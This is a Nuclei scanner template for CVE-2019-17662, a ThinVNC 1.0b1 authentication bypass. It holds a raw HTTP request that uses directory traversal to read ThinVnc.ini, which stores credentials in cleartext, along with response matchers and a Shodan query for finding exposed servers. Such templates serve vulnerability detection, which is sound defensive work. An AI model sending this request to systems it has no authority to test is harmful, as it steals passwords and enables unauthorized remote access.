id: CVE-2019-17662

info:
  name: ThinVNC 1.0b1 - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the ThinVNC application.
  remediation: |
    Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms.
  reference:
    - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
    - https://github.com/bewest/thinvnc/issues/5
    - https://redteamzone.com/ThinVNC/
    - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py
    - https://github.com/YIXINSHUWU/Penetration_Testing_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-17662
    cwe-id: CWE-22
    epss-score: 0.64941
    epss-percentile: 0.97813
    cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cybelsoft
    product: thinvnc
    shodan-query: http.favicon.hash:-1414548363
  tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft

http:
  - raw:
      - |
        GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "User="
          - "Password="
        condition: and

      - type: word
        part: header
        words:
          - "application/binary"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202fb82bfb26b97edcb70f493b3640966574b012e563f89c2cdf77953916740bd2022100c643b657ac203096fd96e6dd9cd4a8942c4db7a202addc62e1a0390d913b83e7:922c64590222798bb761d5b6d8e72950